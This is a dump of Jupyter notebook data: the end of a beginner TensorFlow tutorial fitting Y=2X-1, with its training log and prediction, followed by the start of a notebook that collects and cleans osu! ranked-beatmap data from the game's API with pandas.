- 0s 700us/sample - loss: 0.0119\nEpoch 216/500\n6/6 [==============================] - 0s 746us/sample - loss: 0.0116\nEpoch 217/500\n6/6 [==============================] - 0s 601us/sample - loss: 0.0114\nEpoch 218/500\n6/6 [==============================] - 0s 549us/sample - loss: 0.0111\nEpoch 219/500\n6/6 [==============================] - 0s 580us/sample - loss: 0.0109\nEpoch 220/500\n6/6 [==============================] - 0s 541us/sample - loss: 0.0107\nEpoch 221/500\n6/6 [==============================] - 0s 760us/sample - loss: 0.0105\nEpoch 222/500\n6/6 [==============================] - 0s 539us/sample - loss: 0.0103\nEpoch 223/500\n6/6 [==============================] - 0s 516us/sample - loss: 0.0100\nEpoch 224/500\n6/6 [==============================] - 0s 533us/sample - loss: 0.0098\nEpoch 225/500\n6/6 [==============================] - 0s 511us/sample - loss: 0.0096\nEpoch 226/500\n6/6 [==============================] - 0s 494us/sample - loss: 0.0094\nEpoch 227/500\n6/6 [==============================] - 0s 425us/sample - loss: 0.0092\nEpoch 228/500\n6/6 [==============================] - 0s 608us/sample - loss: 0.0091\nEpoch 229/500\n6/6 [==============================] - 0s 497us/sample - loss: 0.0089\nEpoch 230/500\n6/6 [==============================] - 0s 383us/sample - loss: 0.0087\nEpoch 231/500\n6/6 [==============================] - 0s 1ms/sample - loss: 0.0085\nEpoch 232/500\n6/6 [==============================] - 0s 479us/sample - loss: 0.0083\nEpoch 233/500\n6/6 [==============================] - 0s 681us/sample - loss: 0.0082\nEpoch 234/500\n6/6 [==============================] - 0s 623us/sample - loss: 0.0080\nEpoch 235/500\n6/6 [==============================] - 0s 767us/sample - loss: 0.0078\nEpoch 236/500\n6/6 [==============================] - 0s 781us/sample - loss: 0.0077\nEpoch 237/500\n6/6 [==============================] - 0s 658us/sample - loss: 0.0075\nEpoch 238/500\n6/6 [==============================] - 0s 727us/sample - loss: 0.0074\nEpoch 239/500\n6/6 [==============================] - 0s 780us/sample - loss: 0.0072\nEpoch 240/500\n6/6 [==============================] - 0s 607us/sample - loss: 0.0071\nEpoch 241/500\n6/6 [==============================] - 0s 554us/sample - loss: 0.0069\nEpoch 242/500\n6/6 [==============================] - 0s 581us/sample - loss: 0.0068\nEpoch 243/500\n6/6 [==============================] - 0s 799us/sample - loss: 0.0066\nEpoch 244/500\n6/6 [==============================] - 0s 628us/sample - loss: 0.0065\nEpoch 245/500\n6/6 [==============================] - 0s 779us/sample - loss: 0.0064\nEpoch 246/500\n6/6 [==============================] - 0s 750us/sample - loss: 0.0062\nEpoch 247/500\n6/6 [==============================] - 0s 797us/sample - loss: 0.0061\nEpoch 248/500\n6/6 [==============================] - 0s 674us/sample - loss: 0.0060\nEpoch 249/500\n6/6 [==============================] - 0s 538us/sample - loss: 0.0059\nEpoch 250/500\n6/6 [==============================] - 0s 1ms/sample - loss: 0.0057\nEpoch 251/500\n6/6 [==============================] - 0s 548us/sample - loss: 0.0056\nEpoch 252/500\n6/6 [==============================] - 0s 478us/sample - loss: 0.0055\nEpoch 253/500\n6/6 [==============================] - 0s 461us/sample - loss: 0.0054\nEpoch 254/500\n6/6 [==============================] - 0s 501us/sample - loss: 0.0053\nEpoch 255/500\n6/6 [==============================] - 0s 371us/sample - loss: 0.0052\nEpoch 256/500\n6/6 [==============================] - 0s 500us/sample - loss: 0.0051\nEpoch 257/500\n6/6 [==============================] - 0s 409us/sample - loss: 0.0050\nEpoch 258/500\n6/6 [==============================] - 0s 396us/sample - loss: 0.0049\nEpoch 259/500\n6/6 [==============================] - 0s 374us/sample - loss: 0.0048\nEpoch 260/500\n6/6 [==============================] - 0s 399us/sample - loss: 0.0047\nEpoch 261/500\n6/6 [==============================] - 0s 487us/sample - loss: 0.0046\nEpoch 262/500\n6/6 [==============================] - 0s 305us/sample - loss: 0.0045\nEpoch 263/500\n6/6 [==============================] - 0s 519us/sample - loss: 0.0044\nEpoch 264/500\n6/6 [==============================] - 0s 477us/sample - loss: 0.0043\nEpoch 265/500\n6/6 [==============================] - 0s 454us/sample - loss: 0.0042\nEpoch 266/500\n6/6 [==============================] - 0s 354us/sample - loss: 0.0041\nEpoch 267/500\n6/6 [==============================] - 0s 304us/sample - loss: 0.0040\nEpoch 268/500\n6/6 [==============================] - 0s 372us/sample - loss: 0.0039\nEpoch 269/500\n6/6 [==============================] - 0s 368us/sample - loss: 0.0039\nEpoch 270/500\n6/6 [==============================] - 0s 500us/sample - loss: 0.0038\nEpoch 271/500\n6/6 [==============================] - 0s 455us/sample - loss: 0.0037\nEpoch 272/500\n6/6 [==============================] - 0s 329us/sample - loss: 0.0036\nEpoch 273/500\n6/6 [==============================] - 0s 421us/sample - loss: 0.0036\nEpoch 274/500\n6/6 [==============================] - 0s 417us/sample - loss: 0.0035\nEpoch 275/500\n6/6 [==============================] - 0s 355us/sample - loss: 0.0034\nEpoch 276/500\n6/6 [==============================] - 0s 354us/sample - loss: 0.0033\nEpoch 277/500\n6/6 [==============================] - 0s 368us/sample - loss: 0.0033\nEpoch 278/500\n6/6 [==============================] - 0s 469us/sample - loss: 0.0032\nEpoch 279/500\n6/6 [==============================] - 0s 462us/sample - loss: 0.0031\nEpoch 280/500\n6/6 [==============================] - 0s 419us/sample - loss: 0.0031\nEpoch 281/500\n6/6 [==============================] - 0s 508us/sample - loss: 0.0030\nEpoch 282/500\n6/6 [==============================] - 0s 399us/sample - loss: 0.0030\nEpoch 283/500\n6/6 [==============================] - 0s 472us/sample - loss: 0.0029\nEpoch 284/500\n6/6 [==============================] - 0s 412us/sample - loss: 0.0028\nEpoch 285/500\n6/6 [==============================] - 0s 446us/sample - loss: 0.0028\nEpoch 286/500\n6/6 [==============================] - 0s 914us/sample - loss: 0.0027\nEpoch 287/500\n6/6 [==============================] - 0s 838us/sample - loss: 0.0027\nEpoch 288/500\n6/6 [==============================] - 0s 669us/sample - loss: 0.0026\nEpoch 289/500\n6/6 [==============================] - 0s 457us/sample - loss: 0.0026\nEpoch 290/500\n6/6 [==============================] - 0s 610us/sample - loss: 0.0025\nEpoch 291/500\n6/6 [==============================] - 0s 566us/sample - loss: 0.0024\nEpoch 292/500\n6/6 [==============================] - 0s 433us/sample - loss: 0.0024\nEpoch 293/500\n6/6 [==============================] - 0s 574us/sample - loss: 0.0023\nEpoch 294/500\n6/6 [==============================] - 0s 600us/sample - loss: 0.0023\nEpoch 295/500\n6/6 [==============================] - 0s 592us/sample - loss: 0.0023\nEpoch 296/500\n6/6 [==============================] - 0s 643us/sample - loss: 0.0022\nEpoch 297/500\n6/6 [==============================] - 0s 545us/sample - loss: 0.0022\nEpoch 298/500\n6/6 [==============================] - 0s 586us/sample - loss: 0.0021\nEpoch 299/500\n6/6 [==============================] - 0s 688us/sample - loss: 0.0021\nEpoch 300/500\n6/6 [==============================] - 0s 600us/sample - loss: 0.0020\nEpoch 301/500\n6/6 [==============================] - 0s 637us/sample - loss: 0.0020\nEpoch 302/500\n6/6 [==============================] - 0s 684us/sample - loss: 0.0019\nEpoch 303/500\n6/6 [==============================] - 0s 639us/sample - loss: 0.0019\nEpoch 304/500\n6/6 [==============================] - 0s 620us/sample - loss: 0.0019\nEpoch 305/500\n6/6 [==============================] - 0s 519us/sample - loss: 0.0018\nEpoch 306/500\n6/6 [==============================] - 0s 582us/sample - loss: 0.0018\nEpoch 307/500\n6/6 [==============================] - 0s 597us/sample - loss: 0.0018\nEpoch 308/500\n6/6 [==============================] - 0s 646us/sample - loss: 0.0017\nEpoch 309/500\n6/6 [==============================] - 0s 598us/sample - loss: 0.0017\nEpoch 310/500\n6/6 [==============================] - 0s 519us/sample - loss: 0.0017\nEpoch 311/500\n6/6 [==============================] - 0s 531us/sample - loss: 0.0016\nEpoch 312/500\n6/6 [==============================] - 0s 675us/sample - loss: 0.0016\nEpoch 313/500\n6/6 [==============================] - 0s 528us/sample - loss: 0.0016\nEpoch 314/500\n6/6 [==============================] - 0s 579us/sample - loss: 0.0015\nEpoch 315/500\n6/6 [==============================] - 0s 702us/sample - loss: 0.0015\nEpoch 316/500\n6/6 [==============================] - 0s 738us/sample - loss: 0.0015\nEpoch 317/500\n6/6 [==============================] - 0s 637us/sample - loss: 0.0014\nEpoch 318/500\n6/6 [==============================] - 0s 732us/sample - loss: 0.0014\nEpoch 319/500\n6/6 [==============================] - 0s 597us/sample - loss: 0.0014\nEpoch 320/500\n6/6 [==============================] - 0s 656us/sample - loss: 0.0013\nEpoch 321/500\n6/6 [==============================] - 0s 576us/sample - loss: 0.0013\nEpoch 322/500\n6/6 [==============================] - 0s 541us/sample - loss: 0.0013\nEpoch 323/500\n6/6 [==============================] - 0s 554us/sample - loss: 0.0013\nEpoch 324/500\n6/6 [==============================] - 0s 514us/sample - loss: 0.0012\nEpoch 325/500\n6/6 [==============================] - 0s 863us/sample - loss: 0.0012\nEpoch 326/500\n6/6 [==============================] - 0s 690us/sample - loss: 0.0012\nEpoch 327/500\n6/6 [==============================] - 0s 652us/sample - loss: 0.0012\nEpoch 328/500\n6/6 [==============================] - 0s 647us/sample - loss: 0.0011\nEpoch 329/500\n6/6 [==============================] - 0s 687us/sample - loss: 0.0011\nEpoch 330/500\n6/6 [==============================] - 0s 1ms/sample - loss: 0.0011\nEpoch 331/500\n6/6 [==============================] - 0s 961us/sample - loss: 0.0011\nEpoch 332/500\n6/6 [==============================] - 0s 971us/sample - loss: 0.0010\nEpoch 333/500\n6/6 [==============================] - 0s 722us/sample - loss: 0.0010\nEpoch 334/500\n6/6 [==============================] - 0s 805us/sample - loss: 0.0010\nEpoch 335/500\n6/6 [==============================] - 0s 574us/sample - loss: 9.8273e-04\nEpoch 336/500\n6/6 [==============================] - 0s 800us/sample - loss: 9.6255e-04\nEpoch 337/500\n6/6 [==============================] - 0s 980us/sample - loss: 9.4278e-04\nEpoch 338/500\n6/6 [==============================] - 0s 499us/sample - loss: 9.2341e-04\nEpoch 339/500\n6/6 [==============================] - 0s 711us/sample - loss: 9.0445e-04\nEpoch 340/500\n6/6 [==============================] - 0s 616us/sample - loss: 8.8587e-04\nEpoch 341/500\n6/6 [==============================] - 0s 685us/sample - loss: 8.6767e-04\nEpoch 342/500\n6/6 [==============================] - 0s 552us/sample - loss: 8.4985e-04\nEpoch 343/500\n6/6 [==============================] - 0s 592us/sample - loss: 8.3239e-04\nEpoch 344/500\n6/6 [==============================] - 0s 777us/sample - loss: 8.1529e-04\nEpoch 345/500\n6/6 [==============================] - 0s 828us/sample - loss: 7.9855e-04\nEpoch 346/500\n6/6 [==============================] - 0s 826us/sample - loss: 7.8215e-04\nEpoch 347/500\n6/6 [==============================] - 0s 855us/sample - loss: 7.6608e-04\nEpoch 348/500\n6/6 [==============================] - 0s 833us/sample - loss: 7.5035e-04\nEpoch 349/500\n6/6 [==============================] - 0s 800us/sample - loss: 7.3493e-04\nEpoch 350/500\n6/6 [==============================] - 0s 775us/sample - loss: 7.1983e-04\nEpoch 351/500\n6/6 [==============================] - 0s 2ms/sample - loss: 7.0505e-04\nEpoch 352/500\n6/6 [==============================] - 0s 1ms/sample - loss: 6.9057e-04\nEpoch 353/500\n6/6 [==============================] - 0s 732us/sample - loss: 6.7638e-04\nEpoch 354/500\n6/6 [==============================] - 0s 837us/sample - loss: 6.6249e-04\nEpoch 355/500\n6/6 [==============================] - 0s 877us/sample - loss: 6.4888e-04\nEpoch 356/500\n6/6 [==============================] - 0s 783us/sample - loss: 6.3556e-04\nEpoch 357/500\n6/6 [==============================] - 0s 1ms/sample - loss: 6.2250e-04\nEpoch 358/500\n6/6 [==============================] - 0s 801us/sample - loss: 6.0972e-04\nEpoch 359/500\n6/6 [==============================] - 0s 744us/sample - loss: 5.9719e-04\nEpoch 360/500\n6/6 [==============================] - 0s 738us/sample - loss: 5.8493e-04\nEpoch 361/500\n6/6 [==============================] - 0s 1ms/sample - loss: 5.7291e-04\nEpoch 362/500\n6/6 [==============================] - 0s 681us/sample - loss: 5.6114e-04\nEpoch 363/500\n6/6 [==============================] - 0s 1ms/sample - loss: 5.4961e-04\nEpoch 364/500\n6/6 [==============================] - 0s 644us/sample - loss: 5.3832e-04\nEpoch 365/500\n6/6 [==============================] - 0s 779us/sample - loss: 5.2727e-04\nEpoch 366/500\n6/6 [==============================] - 0s 826us/sample - loss: 5.1644e-04\nEpoch 367/500\n6/6 [==============================] - 0s 583us/sample - loss: 5.0583e-04\nEpoch 368/500\n6/6 [==============================] - 0s 691us/sample - loss: 4.9544e-04\nEpoch 369/500\n6/6 [==============================] - 0s 522us/sample - loss: 4.8526e-04\nEpoch 370/500\n6/6 [==============================] - 0s 608us/sample - loss: 4.7530e-04\nEpoch 371/500\n6/6 [==============================] - 0s 674us/sample - loss: 4.6554e-04\nEpoch 372/500\n6/6 [==============================] - 0s 670us/sample - loss: 4.5597e-04\nEpoch 373/500\n6/6 [==============================] - 0s 533us/sample - loss: 4.4661e-04\nEpoch 374/500\n6/6 [==============================] - 0s 470us/sample - loss: 4.3743e-04\nEpoch 375/500\n6/6 [==============================] - 0s 662us/sample - loss: 4.2845e-04\nEpoch 376/500\n6/6 [==============================] - 0s 670us/sample - loss: 4.1964e-04\nEpoch 377/500\n6/6 [==============================] - 0s 607us/sample - loss: 4.1103e-04\nEpoch 378/500\n6/6 [==============================] - 0s 501us/sample - loss: 4.0258e-04\nEpoch 379/500\n6/6 [==============================] - 0s 759us/sample - loss: 3.9432e-04\nEpoch 380/500\n6/6 [==============================] - 0s 880us/sample - loss: 3.8622e-04\nEpoch 381/500\n6/6 [==============================] - 0s 980us/sample - loss: 3.7828e-04\nEpoch 382/500\n6/6 [==============================] - 0s 1ms/sample - loss: 3.7051e-04\nEpoch 383/500\n6/6 [==============================] - 0s 755us/sample - loss: 3.6290e-04\nEpoch 384/500\n6/6 [==============================] - 0s 498us/sample - loss: 3.5545e-04\nEpoch 385/500\n6/6 [==============================] - 0s 628us/sample - loss: 3.4815e-04\nEpoch 386/500\n6/6 [==============================] - 0s 751us/sample - loss: 3.4100e-04\nEpoch 387/500\n6/6 [==============================] - 0s 676us/sample - loss: 3.3399e-04\nEpoch 388/500\n6/6 [==============================] - 0s 767us/sample - loss: 3.2713e-04\nEpoch 389/500\n6/6 [==============================] - 0s 677us/sample - loss: 3.2041e-04\nEpoch 390/500\n6/6 [==============================] - 0s 551us/sample - loss: 3.1383e-04\nEpoch 391/500\n6/6 [==============================] - 0s 626us/sample - loss: 3.0738e-04\nEpoch 392/500\n6/6 [==============================] - 0s 612us/sample - loss: 3.0107e-04\nEpoch 393/500\n6/6 [==============================] - 0s 562us/sample - loss: 2.9488e-04\nEpoch 394/500\n6/6 [==============================] - 0s 725us/sample - loss: 2.8883e-04\nEpoch 395/500\n6/6 [==============================] - 0s 760us/sample - loss: 2.8290e-04\nEpoch 396/500\n6/6 [==============================] - 0s 675us/sample - loss: 2.7708e-04\nEpoch 397/500\n6/6 [==============================] - 0s 630us/sample - loss: 2.7139e-04\nEpoch 398/500\n6/6 [==============================] - 0s 891us/sample - loss: 2.6582e-04\nEpoch 399/500\n6/6 [==============================] - 0s 833us/sample - loss: 2.6036e-04\nEpoch 400/500\n6/6 [==============================] - 0s 619us/sample - loss: 2.5501e-04\nEpoch 401/500\n6/6 [==============================] - 0s 746us/sample - loss: 2.4977e-04\nEpoch 402/500\n6/6 [==============================] - 0s 693us/sample - loss: 2.4464e-04\nEpoch 403/500\n6/6 [==============================] - 0s 1ms/sample - loss: 2.3961e-04\nEpoch 404/500\n6/6 [==============================] - 0s 1ms/sample - loss: 2.3469e-04\nEpoch 405/500\n6/6 [==============================] - 0s 710us/sample - loss: 2.2987e-04\nEpoch 406/500\n6/6 [==============================] - 0s 696us/sample - loss: 2.2515e-04\nEpoch 407/500\n6/6 [==============================] - 0s 772us/sample - loss: 2.2053e-04\nEpoch 408/500\n6/6 [==============================] - 0s 1ms/sample - loss: 2.1600e-04\nEpoch 409/500\n6/6 [==============================] - 0s 1ms/sample - loss: 2.1156e-04\nEpoch 410/500\n6/6 [==============================] - 0s 1ms/sample - loss: 2.0721e-04\nEpoch 411/500\n6/6 [==============================] - 0s 996us/sample - loss: 2.0296e-04\nEpoch 412/500\n6/6 [==============================] - 0s 996us/sample - loss: 1.9879e-04\nEpoch 413/500\n6/6 [==============================] - 0s 1ms/sample - loss: 1.9471e-04\nEpoch 414/500\n6/6 [==============================] - 0s 1ms/sample - loss: 1.9070e-04\nEpoch 415/500\n6/6 [==============================] - 0s 2ms/sample - loss: 1.8679e-04\nEpoch 416/500\n6/6 [==============================] - 0s 1ms/sample - loss: 1.8295e-04\nEpoch 417/500\n6/6 [==============================] - 0s 2ms/sample - loss: 1.7919e-04\nEpoch 418/500\n6/6 [==============================] - 0s 917us/sample - loss: 1.7551e-04\nEpoch 419/500\n6/6 [==============================] - 0s 947us/sample - loss: 1.7191e-04\nEpoch 420/500\n6/6 [==============================] - 0s 1ms/sample - loss: 1.6838e-04\nEpoch 421/500\n6/6 [==============================] - 0s 795us/sample - loss: 1.6492e-04\nEpoch 422/500\n6/6 [==============================] - 0s 682us/sample - loss: 1.6153e-04\nEpoch 423/500\n6/6 [==============================] - 0s 821us/sample - loss: 1.5821e-04\nEpoch 424/500\n6/6 [==============================] - 0s 628us/sample - loss: 1.5496e-04\nEpoch 425/500\n6/6 [==============================] - 0s 821us/sample - loss: 1.5178e-04\nEpoch 426/500\n6/6 [==============================] - 0s 946us/sample - loss: 1.4866e-04\nEpoch 427/500\n6/6 [==============================] - 0s 683us/sample - loss: 1.4561e-04\nEpoch 428/500\n6/6 [==============================] - 0s 619us/sample - loss: 1.4262e-04\nEpoch 429/500\n6/6 [==============================] - 0s 486us/sample - loss: 1.3969e-04\nEpoch 430/500\n6/6 [==============================] - 0s 833us/sample - loss: 1.3682e-04\nEpoch 431/500\n6/6 [==============================] - 0s 830us/sample - loss: 1.3401e-04\nEpoch 432/500\n6/6 [==============================] - 0s 1ms/sample - loss: 1.3126e-04\nEpoch 433/500\n6/6 [==============================] - 0s 959us/sample - loss: 1.2856e-04\nEpoch 434/500\n6/6 [==============================] - 0s 1ms/sample - loss: 1.2592e-04\nEpoch 435/500\n6/6 [==============================] - 0s 1ms/sample - loss: 1.2333e-04\nEpoch 436/500\n6/6 [==============================] - 0s 913us/sample - loss: 1.2080e-04\nEpoch 437/500\n6/6 [==============================] - 0s 858us/sample - loss: 1.1832e-04\nEpoch 438/500\n6/6 [==============================] - 0s 1ms/sample - loss: 1.1589e-04\nEpoch 439/500\n6/6 [==============================] - 0s 1ms/sample - loss: 1.1351e-04\nEpoch 440/500\n6/6 [==============================] - 0s 955us/sample - loss: 1.1118e-04\nEpoch 441/500\n6/6 [==============================] - 0s 1ms/sample - loss: 1.0889e-04\nEpoch 442/500\n6/6 [==============================] - 0s 829us/sample - loss: 1.0666e-04\nEpoch 443/500\n6/6 [==============================] - 0s 848us/sample - loss: 1.0446e-04\nEpoch 444/500\n6/6 [==============================] - 0s 630us/sample - loss: 1.0232e-04\nEpoch 445/500\n6/6 [==============================] - 0s 706us/sample - loss: 1.0022e-04\nEpoch 446/500\n6/6 [==============================] - 0s 485us/sample - loss: 9.8158e-05\nEpoch 447/500\n6/6 [==============================] - 0s 677us/sample - loss: 9.6141e-05\nEpoch 448/500\n6/6 [==============================] - 0s 720us/sample - loss: 9.4166e-05\nEpoch 449/500\n6/6 [==============================] - 0s 1ms/sample - loss: 9.2232e-05\nEpoch 450/500\n6/6 [==============================] - 0s 1ms/sample - loss: 9.0339e-05\nEpoch 451/500\n6/6 [==============================] - 0s 913us/sample - loss: 8.8483e-05\nEpoch 452/500\n6/6 [==============================] - 0s 760us/sample - loss: 8.6665e-05\nEpoch 453/500\n6/6 [==============================] - 0s 817us/sample - loss: 8.4885e-05\nEpoch 454/500\n6/6 [==============================] - 0s 684us/sample - loss: 8.3141e-05\nEpoch 455/500\n6/6 [==============================] - 0s 654us/sample - loss: 8.1434e-05\nEpoch 456/500\n6/6 [==============================] - 0s 642us/sample - loss: 7.9761e-05\nEpoch 457/500\n6/6 [==============================] - 0s 643us/sample - loss: 7.8122e-05\nEpoch 458/500\n6/6 [==============================] - 0s 633us/sample - loss: 7.6518e-05\nEpoch 459/500\n6/6 [==============================] - 0s 565us/sample - loss: 7.4946e-05\nEpoch 460/500\n6/6 [==============================] - 0s 716us/sample - loss: 7.3407e-05\nEpoch 461/500\n6/6 [==============================] - 0s 480us/sample - loss: 7.1900e-05\nEpoch 462/500\n6/6 [==============================] - 0s 545us/sample - loss: 7.0422e-05\nEpoch 463/500\n6/6 [==============================] - 0s 599us/sample - loss: 6.8976e-05\nEpoch 464/500\n6/6 [==============================] - 0s 580us/sample - loss: 6.7560e-05\nEpoch 465/500\n6/6 [==============================] - 0s 744us/sample - loss: 6.6173e-05\nEpoch 466/500\n6/6 [==============================] - 0s 770us/sample - loss: 6.4813e-05\nEpoch 467/500\n6/6 [==============================] - 0s 768us/sample - loss: 6.3482e-05\nEpoch 468/500\n6/6 [==============================] - 0s 731us/sample - loss: 6.2178e-05\nEpoch 469/500\n6/6 [==============================] - 0s 779us/sample - loss: 6.0901e-05\nEpoch 470/500\n6/6 [==============================] - 0s 611us/sample - loss: 5.9650e-05\nEpoch 471/500\n6/6 [==============================] - 0s 845us/sample - loss: 5.8424e-05\nEpoch 472/500\n6/6 [==============================] - 0s 720us/sample - loss: 5.7224e-05\nEpoch 473/500\n6/6 [==============================] - 0s 770us/sample - loss: 5.6048e-05\nEpoch 474/500\n6/6 [==============================] - 0s 901us/sample - loss: 5.4897e-05\nEpoch 475/500\n6/6 [==============================] - 0s 800us/sample - loss: 5.3769e-05\nEpoch 476/500\n6/6 [==============================] - 0s 2ms/sample - loss: 5.2665e-05\nEpoch 477/500\n6/6 [==============================] - 0s 1ms/sample - loss: 5.1584e-05\nEpoch 478/500\n6/6 [==============================] - 0s 1ms/sample - loss: 5.0525e-05\nEpoch 479/500\n6/6 [==============================] - 0s 868us/sample - loss: 4.9486e-05\nEpoch 480/500\n6/6 [==============================] - 0s 823us/sample - loss: 4.8469e-05\nEpoch 481/500\n6/6 [==============================] - 0s 867us/sample - loss: 4.7475e-05\nEpoch 482/500\n6/6 [==============================] - 0s 1ms/sample - loss: 4.6499e-05\nEpoch 483/500\n6/6 [==============================] - 0s 1ms/sample - loss: 4.5544e-05\nEpoch 484/500\n6/6 [==============================] - 0s 952us/sample - loss: 4.4609e-05\nEpoch 485/500\n6/6 [==============================] - 0s 1ms/sample - loss: 4.3692e-05\nEpoch 486/500\n6/6 [==============================] - 0s 1ms/sample - loss: 4.2795e-05\nEpoch 487/500\n6/6 [==============================] - 0s 1ms/sample - loss: 4.1916e-05\nEpoch 488/500\n6/6 [==============================] - 0s 1ms/sample - loss: 4.1054e-05\nEpoch 489/500\n6/6 [==============================] - 0s 1ms/sample - loss: 4.0211e-05\nEpoch 490/500\n6/6 [==============================] - 0s 964us/sample - loss: 3.9385e-05\nEpoch 491/500\n6/6 [==============================] - 0s 1ms/sample - loss: 3.8576e-05\nEpoch 492/500\n6/6 [==============================] - 0s 644us/sample - loss: 3.7784e-05\nEpoch 493/500\n6/6 [==============================] - 0s 540us/sample - loss: 3.7008e-05\nEpoch 494/500\n6/6 [==============================] - 0s 694us/sample - loss: 3.6248e-05\nEpoch 495/500\n6/6 [==============================] - 0s 696us/sample - loss: 3.5504e-05\nEpoch 496/500\n6/6 [==============================] - 0s 615us/sample - loss: 3.4774e-05\nEpoch 497/500\n6/6 [==============================] - 0s 477us/sample - loss: 3.4060e-05\nEpoch 498/500\n6/6 [==============================] - 0s 687us/sample - loss: 3.3360e-05\nEpoch 499/500\n6/6 [==============================] - 0s 708us/sample - loss: 3.2676e-05\nEpoch 500/500\n6/6 [==============================] - 0s 690us/sample - loss: 3.2004e-05\n"
]
],
[
[
"Ok, now you have a model that has been trained to learn the relationshop between X and Y. You can use the **model.predict** method to have it figure out the Y for a previously unknown X. So, for example, if X = 10, what do you think Y will be? Take a guess before you run this code:",
"_____no_output_____"
]
],
[
[
"print(model.predict([10.0]))",
"[[18.983494]]\n"
]
],
[
[
"You might have thought 19, right? But it ended up being a little under. Why do you think that is? \n\nRemember that neural networks deal with probabilities, so given the data that we fed the NN with, it calculated that there is a very high probability that the relationship between X and Y is Y=2X-1, but with only 6 data points we can't know for sure. As a result, the result for 10 is very close to 19, but not necessarily 19. \n\nAs you work with neural networks, you'll see this pattern recurring. You will almost always deal with probabilities, not certainties, and will do a little bit of coding to figure out what the result is based on the probabilities, particularly when it comes to classification.\n",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
]
] |
e70881972769948f30a150fdd033fd57c0b70dcb | 25,906 | ipynb | Jupyter Notebook | A_Year_In_Mapping_2020.ipynb | tommy9301122/A_Year_In_Mapping_2020 | 6a142076fea0f734b701db25326333e261b2255d | [
"MIT"
] | null | null | null | A_Year_In_Mapping_2020.ipynb | tommy9301122/A_Year_In_Mapping_2020 | 6a142076fea0f734b701db25326333e261b2255d | [
"MIT"
] | null | null | null | A_Year_In_Mapping_2020.ipynb | tommy9301122/A_Year_In_Mapping_2020 | 6a142076fea0f734b701db25326333e261b2255d | [
"MIT"
] | null | null | null | 40.732704 | 228 | 0.373234 | [
[
[
"import warnings\nwarnings.filterwarnings('ignore')\nimport numpy as np\nimport pandas as pd\npd.set_option('display.max_columns', 100)\nimport requests\nfrom IPython.display import clear_output\nfrom tqdm.notebook import tqdm\nimport datetime",
"_____no_output_____"
],
[
"start_date = '2007-10-06'\nend_date = '2021-02-17'",
"_____no_output_____"
]
],
[
[
"### API抓資料",
"_____no_output_____"
]
],
[
[
"d_api = {}\nd_i = 0 \nsince_date = start_date\nwhile since_date < end_date:\n \n get_beatmaps = requests.get('https://osu.ppy.sh/api/get_beatmaps?k=***************************&m=0&since='+since_date).json() # API v1 key\n clear_output()\n for i in get_beatmaps:\n d_api[d_i] = i\n d_i = d_i+1\n last_date = i['approved_date']\n since_date = datetime.datetime.strptime(last_date, '%Y-%m-%d %H:%M:%S').strftime('%Y-%m-%d')\n print(since_date)\n \ndf_api = pd.DataFrame.from_dict(d_api, \"index\")\ndf_api = df_api.drop_duplicates(['beatmapset_id','beatmap_id'], keep='first') # 去重複\ndf_api = df_api.loc[df_api.approved_date <= end_date] # 固定時間\nclear_output()\n\nbeatmapset_counts = len(df_api.beatmapset_id.value_counts())\nfirst_ranked_date = df_api.head(1).approved_date.values[0]\nlast_ranked_date = df_api.tail(1).approved_date.values[0]\n\nprint('Done!')\nprint(str(beatmapset_counts)+' mapsets ')\nprint(str(first_ranked_date) + ' to ' + str(last_ranked_date))",
"Done!\n21388 mapsets \n2007-10-06 17:46:31 to 2021-02-16 23:02:02\n"
]
],
[
[
"### 整理",
"_____no_output_____"
]
],
[
[
"# Rank & Love\ndf_rank_map = df_api.loc[(df_api.approved=='1')|(df_api.approved=='4')]\ndf_rank_map['status'] = df_rank_map.approved.map({'1':'Rank','4':'Love'})\n#print(df_rank_map.status.value_counts())\n\n\nprint('clean data....')\n# 難度\ndf_rank_map['difficulty_rating'] = df_rank_map['difficultyrating'].apply(lambda x:'Easy' if float(x)<2 else(\n 'Normal' if float(x)>=2 and float(x)<2.7 else(\n 'Hard' if float(x)>=2.7 and float(x)<4 else(\n 'Insane' if float(x)>=4 and float(x)<5.3 else(\n 'Expert' if float(x)>=5.3 and float(x)<6.5 else'Expert+')))))\n\n# 類別ID轉名稱\ndf_rank_map['genre_id'] = df_rank_map.genre_id.map({'1':'Unspecified',\n '2':'Video Game',\n '3':'Anime',\n '4':'Rock',\n '5':'Pop',\n '6':'Other',\n '7':'Novelty',\n '8':'Hip Hop',\n '9':'Electronic',\n '10':'Metal',\n '11':'Classical',\n '12':'Folk',\n '13':'Jazz'})\n\n# 語言ID轉名稱\ndf_rank_map['language_id'] = df_rank_map.language_id.map({'1':'Unspecified',\n '2':'English',\n '3':'Japanese',\n '4':'Chinese',\n '5':'Instrumental',\n '6':'Korean',\n '7':'FrenchItalian',\n '8':'German',\n '9':'Swedish',\n '10':'Spanish',\n '11':'Polish',\n '12':'Russian',\n '14':'Other'})\n\n# 將title和artist的unicode遺失值用英文補齊\ndf_rank_map['artist_unicode'] = df_rank_map['artist_unicode'].fillna(df_rank_map['artist'])\ndf_rank_map['title_unicode'] = df_rank_map['title_unicode'].fillna(df_rank_map['title'])\n\n# 類別、語言 補遺失值\ndf_rank_map['genre_id'] = df_rank_map['genre_id'].fillna('Unspecified')\ndf_rank_map['language_id'] = df_rank_map['language_id'].fillna('Unspecified')\n\n# 指定所需欄位\ndf_rank_map_overview = df_rank_map[['beatmapset_id','beatmap_id',\n 'genre_id','language_id','status',\n 'title_unicode','artist_unicode',\n 'approved_date',\n 'version','difficulty_rating',\n 'creator_id',\n 'favourite_count','playcount']] \n# 欄位資料型態\ndf_rank_map_overview = df_rank_map_overview.astype({'beatmapset_id':'int64',\n 'favourite_count':'int64',\n 'playcount':'int64'})\ndf_rank_map_overview['approved_date'] = pd.to_datetime(df_rank_map_overview['approved_date'], format='%Y-%m-%d %H:%M:%S')\n\n# groupby\ndf_rank_mapset_overview = df_rank_map_overview.groupby('beatmapset_id').agg({'beatmap_id':'count',\n 'status':'min',\n 'genre_id':'min',\n 'language_id':'min',\n 'title_unicode':'min', \n 'artist_unicode':'min',\n 'creator_id':'min', \n 'approved_date':'min', \n 'favourite_count':'min',\n 'playcount':'sum'}).reset_index(drop=False)",
